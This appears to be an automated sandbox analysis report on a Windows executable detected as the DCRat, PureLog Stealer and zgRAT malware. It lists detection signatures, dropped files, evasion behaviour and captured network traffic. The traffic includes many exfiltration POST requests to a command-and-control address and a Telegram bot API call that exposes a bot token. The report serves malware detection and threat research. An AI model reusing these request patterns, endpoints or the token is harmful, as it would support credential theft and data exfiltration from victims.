Windows Analysis Report
d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe

Overview

General Information

Sample name: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
Analysis ID: 1531798
MD5: 670861d1059f9baf2a8525097157d1c2
SHA1: f7007917499121cd5107697593a9429911ae0e77
SHA256: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
Tags: DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Recovery\WmiPrvSE.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Avira: detection malicious, Label: HEUR/AGEN.1323342
Multi AV Scanner detection for dropped file
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Recovery\WmiPrvSE.exe ReversingLabs: Detection: 87%
Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe ReversingLabs: Detection: 87%
Source: C:\Users\user\Desktop\ArFrORkS.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\EhviVOkL.log ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\KIRpkYvx.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\QyIevzpi.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\VWRNVcdg.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\fTGLCVSM.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\hILtgrfA.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\sBnSdgqk.log ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\uDZAyPvf.log ReversingLabs: Detection: 45%
Source: C:\Users\user\Desktop\wjuqGuQY.log ReversingLabs: Detection: 29%
Source: C:\Users\user\Downloads\smartscreen.exe ReversingLabs: Detection: 87%
Multi AV Scanner detection for submitted file
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe ReversingLabs: Detection: 87%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Joe Sandbox ML: detected
Source: C:\Recovery\WmiPrvSE.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Code function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh 0_2_00007FF848FAD35D

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49798 -> 5.42.66.51:80
Source: Network traffic Suricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49896 -> 5.42.66.51:80
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic HTTP traffic detected: POST /bot7829111840:AAGwC163Z3bte6z_YuN643yX5LplCCYUaLM/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="34997188-a42f-41eb-990d-cfd33339eec7"Host: api.telegram.orgContent-Length: 86200Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View IP Address: 34.117.59.81 34.117.59.81
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View ASN Name: RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: ipinfo.io
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49705 -> 34.117.59.81:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 336Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 384Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2052Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2052Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2052Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: multipart/form-data; boundary=----I9nNPSHYdg1RY1Gju0uTq58PsHKk1qoBdyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 119102Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2544Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
